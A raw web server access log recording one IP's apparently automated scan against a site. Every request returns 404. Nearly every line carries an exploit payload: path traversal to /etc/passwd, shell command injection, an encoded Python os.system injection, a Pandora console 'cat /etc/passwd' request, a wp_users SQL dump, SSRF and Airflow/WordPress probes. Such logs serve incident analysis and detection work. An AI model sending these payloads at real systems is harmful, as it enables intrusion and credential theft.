137.220.197.141 - - [21/Jan/2024:15:58:50 +0100] "POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:58:50 +0100] "GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:58:51 +0100] "GET /cgi-bin/ExportAllSettings.sh HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:58:51 +0100] "POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:59:02 +0100] "POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:59:13 +0100] "GET /cgi-bin/ExportAllSettings.sh HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:00:05 +0100] "GET /api/experimental/test HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:00:08 +0100] "GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:00:09 +0100] "GET /cgi-bin/live_api.cgi?page=kHj&id=7&ip=;id; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:00:09 +0100] "POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:00:21 +0100] "GET /cgi-bin/live_api.cgi?page=kHj&id=7&ip=;id; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:01:11 +0100] "GET /files/ldap.debug.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:01:54 +0100] "GET /files/ldap.debug.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:02:15 +0100] "GET /files/ldap.debug.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:02:33 +0100] "POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:02:40 +0100] "GET /cgi-bin/ExportAllSettings.sh HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:03:24 +0100] "POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:03:29 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:03:31 +0100] "GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2bECynUHGyCqORm1Js8AuD7q6vR.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:03:49 +0100] "POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:03:56 +0100] "POST /cgi-bin/login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:04:01 +0100] "GET /fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:04:32 +0100] "GET /cgi-bin/ExportAllSettings.sh HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:04:44 +0100] "GET /cgi-bin/ExportAllSettings.sh HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:05:30 +0100] "POST /cgi-bin/login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:05:37 +0100] "GET /fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:05:40 +0100] "POST /cgi-bin/login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:05:42 +0100] "GET /files/ldap.debug.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:05:48 +0100] "GET /fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:05:52 +0100] "POST /cgi-bin/login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:06:00 +0100] "GET /fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:06:19 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:06:21 +0100] "GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2bECynUHGyCqORm1Js8AuD7q6vR.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:06:40 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:06:42 +0100] "GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2bECynUHGyCqORm1Js8AuD7q6vR.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:07:04 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:07:06 +0100] "GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2bECynUHGyCqORm1Js8AuD7q6vR.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:07:34 +0100] "GET /files/ldap.debug.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:07:45 +0100] "GET /files/ldap.debug.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:08:03 +0100] "POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:08:44 +0100] "GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d6d4a4651336f7859565233566b3830596b5a764d4864494d6b3154526d39524d33424e22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:08:46 +0100] "GET /webadmin/out HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:09:11 +0100] "POST /cgi-bin/login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:09:28 +0100] "GET /fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:10:01 +0100] "POST /cgi-bin/login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:10:15 +0100] "POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:10:21 +0100] "GET /fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:10:25 +0100] "POST /cgi-bin/login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:10:29 +0100] "POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:10:45 +0100] "GET /fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:11:35 +0100] "GET /avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:11:37 +0100] "GET /grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:11:41 +0100] "GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d6d4a4651336f7859565233566b3830596b5a764d4864494d6b3154526d39524d33424e22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:11:43 +0100] "GET /webadmin/out HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:12:01 +0100] "GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d6d4a4651336f7859565233566b3830596b5a764d4864494d6b3154526d39524d33424e22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:12:03 +0100] "GET /webadmin/out HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:12:26 +0100] "GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d6d4a4651336f7859565233566b3830596b5a764d4864494d6b3154526d39524d33424e22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:12:28 +0100] "GET /webadmin/out HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:12:48 +0100] "GET /api/experimental/test HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:12:50 +0100] "GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:12:52 +0100] "POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:13:13 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:13:15 +0100] "GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2bECynUHGyCqORm1Js8AuD7q6vR.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:13:59 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:14:01 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:14:04 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:14:19 +0100] "GET /avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:14:21 +0100] "GET /grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:14:35 +0100] "POST /cgi-bin/login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:14:40 +0100] "GET /avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:14:42 +0100] "GET /grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:14:49 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:14:51 +0100] "GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2bECynUHGyCqORm1Js8AuD7q6vR.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:15:02 +0100] "GET /fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:15:04 +0100] "GET /avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:15:06 +0100] "GET /grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:15:33 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:15:35 +0100] "GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2bECynUHGyCqORm1Js8AuD7q6vR.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:16:42 +0100] "POST /cgi-bin/login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:16:56 +0100] "POST /cgi-bin/login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:17:15 +0100] "GET /fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:17:29 +0100] "GET /fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:18:00 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:18:03 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:18:04 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:18:31 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:18:33 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:18:35 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:18:45 +0100] "GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d6d4a4651336f7859565233566b3830596b5a764d4864494d6b3154526d39524d33424e22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:18:47 +0100] "GET /webadmin/out HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:19:05 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:19:07 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:19:09 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:19:39 +0100] "GET /api/experimental/test HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:19:41 +0100] "GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:19:43 +0100] "POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:20:23 +0100] "GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d6d4a4651336f7859565233566b3830596b5a764d4864494d6b3154526d39524d33424e22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:20:24 +0100] "GET /api/experimental/test HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:20:24 +0100] "GET /webadmin/out HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:20:26 +0100] "GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:20:28 +0100] "POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:20:47 +0100] "GET /avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:20:49 +0100] "GET /grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:21:11 +0100] "GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d6d4a4651336f7859565233566b3830596b5a764d4864494d6b3154526d39524d33424e22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:21:13 +0100] "GET /webadmin/out HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:22:11 +0100] "POST /lib/crud/userprocess.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:22:13 +0100] "GET /login.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:22:15 +0100] "POST /lib/crud/userprocess.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:22:19 +0100] "GET /avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:22:21 +0100] "GET /grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:23:04 +0100] "GET /avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:23:06 +0100] "GET /grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:23:18 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:23:20 +0100] "GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2bECynUHGyCqORm1Js8AuD7q6vR.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:24:01 +0100] "GET /wp-json/acf/v3/options/a?id=active&field=plugins HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:24:45 +0100] "POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:25:24 +0100] "GET /wp-json/acf/v3/options/a?id=active&field=plugins HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:25:34 +0100] "GET /wp-json/acf/v3/options/a?id=active&field=plugins HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:25:35 +0100] "GET /api/experimental/latest_runs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:25:47 +0100] "GET /wp-json/acf/v3/options/a?id=active&field=plugins HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:26:14 +0100] "POST /lib/crud/userprocess.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:26:16 +0100] "GET /login.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:26:18 +0100] "POST /lib/crud/userprocess.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:26:22 +0100] "POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:26:34 +0100] "POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:26:45 +0100] "POST /lib/crud/userprocess.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:26:46 +0100] "POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:26:46 +0100] "GET /login.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:26:49 +0100] "POST /lib/crud/userprocess.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:26:56 +0100] "GET /api/experimental/latest_runs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:27:06 +0100] "GET /api/experimental/latest_runs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:27:18 +0100] "GET /api/experimental/latest_runs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:27:19 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:27:20 +0100] "POST /lib/crud/userprocess.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:27:21 +0100] "GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2bECynUHGyCqORm1Js8AuD7q6vR.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:27:21 +0100] "GET /login.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:27:24 +0100] "POST /lib/crud/userprocess.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:27:35 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:27:37 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:27:39 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:27:45 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:27:47 +0100] "GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2bECynUHGyCqORm1Js8AuD7q6vR.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:28:34 +0100] "POST /context.json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:28:39 +0100] "GET /wp-json/acf/v3/options/a?id=active&field=plugins HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:29:03 +0100] "GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d6d4a4651336f7859565233566b3830596b5a764d4864494d6b3154526d39524d33424e22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:29:05 +0100] "GET /webadmin/out HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:29:26 +0100] "GET /wp-json/acf/v3/options/a?id=active&field=plugins HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:29:48 +0100] "GET /wp-json/acf/v3/options/a?id=active&field=plugins HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:29:54 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:29:56 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:29:58 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:30:13 +0100] "GET /api/experimental/latest_runs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:30:15 +0100] "POST /context.json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:30:19 +0100] "POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:30:19 +0100] "GET /avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:30:23 +0100] "GET /grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:30:26 +0100] "POST /context.json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:30:30 +0100] "GET /?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:30:40 +0100] "POST /context.json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:31:02 +0100] "GET /api/experimental/latest_runs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:31:03 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:31:05 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:31:07 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:31:15 +0100] "POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:31:25 +0100] "GET /api/experimental/latest_runs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:31:41 +0100] "POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:31:58 +0100] "GET /?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:32:09 +0100] "GET /?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:32:23 +0100] "GET /?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:33:17 +0100] "GET /user/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:33:22 +0100] "GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d6d4a4651336f7859565233566b3830596b5a764d4864494d6b3154526d39524d33424e22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:33:24 +0100] "GET /webadmin/out HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:33:39 +0100] "GET /wp-json/acf/v3/options/a?id=active&field=plugins HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:33:50 +0100] "GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d6d4a4651336f7859565233566b3830596b5a764d4864494d6b3154526d39524d33424e22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:33:52 +0100] "GET /webadmin/out HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:34:21 +0100] "POST /context.json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:34:29 +0100] "GET /avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:34:31 +0100] "GET /grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:34:56 +0100] "GET /avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:34:58 +0100] "GET /grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:35:11 +0100] "GET /api/experimental/latest_runs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:35:19 +0100] "POST /context.json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:35:22 +0100] "GET /user/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:35:28 +0100] "GET /?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:35:37 +0100] "GET /user/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:35:42 +0100] "GET /wp-json/acf/v3/options/a?id=active&field=plugins HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:35:45 +0100] "POST /context.json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:35:55 +0100] "GET /wp-json/acf/v3/options/a?id=active&field=plugins HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:35:55 +0100] "GET /user/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:36:08 +0100] "POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1" 404 952
